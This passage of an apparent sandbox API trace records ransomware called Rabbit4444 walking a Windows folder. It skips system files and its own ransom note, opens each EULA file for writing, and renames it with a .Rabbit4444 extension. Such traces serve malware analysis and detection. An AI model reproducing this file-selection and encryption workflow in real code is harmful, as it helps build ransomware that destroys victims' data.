(lpString1="EULA_sk-sk.htm", lpString2="boot") returned 1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="ids.txt") returned -1 [0047.631] lstrcmpiW (lpString1="EULA_sk-sk.htm", lpString2="NTUSER.DAT") returned -1 [0047.631] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_sk-sk.htm" | out: lpString1="EULA_sk-sk.htm") returned="EULA_sk-sk.htm" [0047.631] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm", dwFileAttributes=0x0) returned 1 [0047.632] lstrlenW (lpString="EULA_sk-sk.htm") returned 14 [0047.632] lstrlenW (lpString="Rabbit4444") returned 10 [0047.632] lstrcmpiW (lpString1="_sk-sk.htm", lpString2="Rabbit4444") returned -1 [0047.632] lstrlenW (lpString=".dll") returned 4 [0047.632] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.632] lstrlenW (lpString=".lnk") returned 4 [0047.632] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.632] lstrlenW (lpString=".ini") returned 4 [0047.632] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.632] lstrlenW (lpString=".sys") returned 4 [0047.632] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.632] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.632] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.632] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13894276566) returned 1 [0047.632] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=81953) returned 1 [0047.632] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0047.632] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0047.632] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14330, lpName=0x0) returned 0x298 [0047.633] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14330) returned 0x70000 [0047.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0047.637] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0047.637] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13894808985) returned 1 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0047.637] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0047.637] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.638] CloseHandle (hObject=0x298) returned 1 [0047.638] CloseHandle (hObject=0x278) returned 1 [0047.641] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.Rabbit4444") returned 63 [0047.641] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sk-sk.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sk-sk.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.642] InterlockedExchangeAdd (in: Addend=0xff618, Value=81968 | out: Addend=0xff618) returned 13716304 [0047.642] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3215 [0047.642] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5cfdc2, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5cfdc2, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1026f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sl-si.htm", cAlternateFileName="EULA_S~2.HTM")) returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="Rabbit4444.exe") returned -1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2=".") returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="..") returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="windows") returned -1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="bootmgr") returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="pagefile.sys") returned -1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="boot") returned 1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="ids.txt") returned -1 [0047.642] lstrcmpiW (lpString1="EULA_sl-si.htm", lpString2="NTUSER.DAT") returned -1 [0047.642] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_sl-si.htm" | out: lpString1="EULA_sl-si.htm") returned="EULA_sl-si.htm" [0047.642] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm", dwFileAttributes=0x0) returned 1 [0047.643] lstrlenW (lpString="EULA_sl-si.htm") returned 14 [0047.643] lstrlenW (lpString="Rabbit4444") returned 10 [0047.643] lstrcmpiW (lpString1="_sl-si.htm", lpString2="Rabbit4444") returned -1 [0047.643] lstrlenW (lpString=".dll") returned 4 [0047.643] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.643] lstrlenW (lpString=".lnk") returned 4 [0047.643] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.643] lstrlenW (lpString=".ini") returned 4 [0047.643] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.643] lstrlenW (lpString=".sys") returned 4 [0047.643] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.643] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.643] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.643] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13895405543) returned 1 [0047.643] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=66159) returned 1 [0047.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0047.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0047.643] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10570, lpName=0x0) returned 0x298 [0047.645] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10570) returned 0x70000 [0047.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.649] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13895994413) returned 1 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0047.649] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0047.649] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.650] CloseHandle (hObject=0x298) returned 1 [0047.650] CloseHandle (hObject=0x278) returned 1 [0047.652] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.Rabbit4444") returned 63 [0047.652] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sl-si.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sl-si.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.653] InterlockedExchangeAdd (in: Addend=0xff618, Value=66160 | out: Addend=0xff618) returned 13798272 [0047.653] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3220 [0047.653] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x12720, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sr-latn-cs.htm", cAlternateFileName="EULA_S~3.HTM")) returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="Rabbit4444.exe") returned -1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2=".") returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="..") returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="windows") returned -1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="bootmgr") returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="pagefile.sys") returned -1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="boot") returned 1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="ids.txt") returned -1 [0047.653] lstrcmpiW (lpString1="EULA_sr-latn-cs.htm", lpString2="NTUSER.DAT") returned -1 [0047.653] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_sr-latn-cs.htm" | out: lpString1="EULA_sr-latn-cs.htm") returned="EULA_sr-latn-cs.htm" [0047.653] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm", dwFileAttributes=0x0) returned 1 [0047.672] lstrlenW (lpString="EULA_sr-latn-cs.htm") returned 19 [0047.672] lstrlenW (lpString="Rabbit4444") returned 10 [0047.672] lstrcmpiW (lpString1="atn-cs.htm", lpString2="Rabbit4444") returned -1 [0047.672] lstrlenW (lpString=".dll") returned 4 [0047.672] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.672] lstrlenW (lpString=".lnk") returned 4 [0047.672] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.672] lstrlenW (lpString=".ini") returned 4 [0047.672] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.672] lstrlenW (lpString=".sys") returned 4 [0047.672] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.672] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.672] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.672] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13898313804) returned 1 [0047.672] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=75552) returned 1 [0047.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0047.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0047.673] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12a20, lpName=0x0) returned 0x298 [0047.674] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12a20) returned 0x70000 [0047.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0047.677] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0047.677] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0047.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0047.678] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13898849317) returned 1 [0047.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0047.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0047.678] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.679] CloseHandle (hObject=0x298) returned 1 [0047.679] CloseHandle (hObject=0x278) returned 1 [0047.681] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.Rabbit4444") returned 68 [0047.681] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sr-latn-cs.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sr-latn-cs.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.682] InterlockedExchangeAdd (in: Addend=0xff618, Value=75552 | out: Addend=0xff618) returned 13864432 [0047.682] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3225 [0047.682] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x112f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_sv-se.htm", cAlternateFileName="EULA_S~4.HTM")) returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="Rabbit4444.exe") returned -1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2=".") returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="..") returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="windows") returned -1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="bootmgr") returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="pagefile.sys") returned -1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="boot") returned 1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="ids.txt") returned -1 [0047.682] lstrcmpiW (lpString1="EULA_sv-se.htm", lpString2="NTUSER.DAT") returned -1 [0047.682] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_sv-se.htm" | out: lpString1="EULA_sv-se.htm") returned="EULA_sv-se.htm" [0047.682] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm", dwFileAttributes=0x0) returned 1 [0047.683] lstrlenW (lpString="EULA_sv-se.htm") returned 14 [0047.683] lstrlenW (lpString="Rabbit4444") returned 10 [0047.683] lstrcmpiW (lpString1="_sv-se.htm", lpString2="Rabbit4444") returned -1 [0047.683] lstrlenW (lpString=".dll") returned 4 [0047.683] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.683] lstrlenW (lpString=".lnk") returned 4 [0047.683] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.683] lstrlenW (lpString=".ini") returned 4 [0047.683] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.683] lstrlenW (lpString=".sys") returned 4 [0047.683] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.683] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.683] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.683] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13899403307) returned 1 [0047.683] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70391) returned 1 [0047.683] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0047.683] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0047.683] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11600, lpName=0x0) returned 0x298 [0047.684] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11600) returned 0x70000 [0047.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.688] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0047.688] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.688] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0047.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.689] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13899933386) returned 1 [0047.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0047.689] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0047.689] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.689] CloseHandle (hObject=0x298) returned 1 [0047.689] CloseHandle (hObject=0x278) returned 1 [0047.692] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.Rabbit4444") returned 63 [0047.692] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_sv-se.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_sv-se.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.692] InterlockedExchangeAdd (in: Addend=0xff618, Value=70400 | out: Addend=0xff618) returned 13939984 [0047.692] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3230 [0047.692] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea5e364e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea5e364e, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_th-th.htm", cAlternateFileName="EULA_T~1.HTM")) returned 1 [0047.692] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.692] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="Rabbit4444.exe") returned -1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2=".") returned 1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="..") returned 1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="windows") returned -1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="bootmgr") returned 1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="pagefile.sys") returned -1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="boot") returned 1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="ids.txt") returned -1 [0047.693] lstrcmpiW (lpString1="EULA_th-th.htm", lpString2="NTUSER.DAT") returned -1 [0047.693] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_th-th.htm" | out: lpString1="EULA_th-th.htm") returned="EULA_th-th.htm" [0047.693] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm", dwFileAttributes=0x0) returned 1 [0047.693] lstrlenW (lpString="EULA_th-th.htm") returned 14 [0047.693] lstrlenW (lpString="Rabbit4444") returned 10 [0047.693] lstrcmpiW (lpString1="_th-th.htm", lpString2="Rabbit4444") returned -1 [0047.693] lstrlenW (lpString=".dll") returned 4 [0047.693] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.693] lstrlenW (lpString=".lnk") returned 4 [0047.693] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.693] lstrlenW (lpString=".ini") returned 4 [0047.693] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.693] lstrlenW (lpString=".sys") returned 4 [0047.694] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.694] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_th-th.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_th-th.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.694] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.694] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13900446934) returned 1 [0047.694] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=254145) returned 1 [0047.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0047.694] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0047.694] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e3d0, lpName=0x0) returned 0x298 [0047.695] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e3d0) returned 0x70000 [0047.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0047.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.703] HeapFree 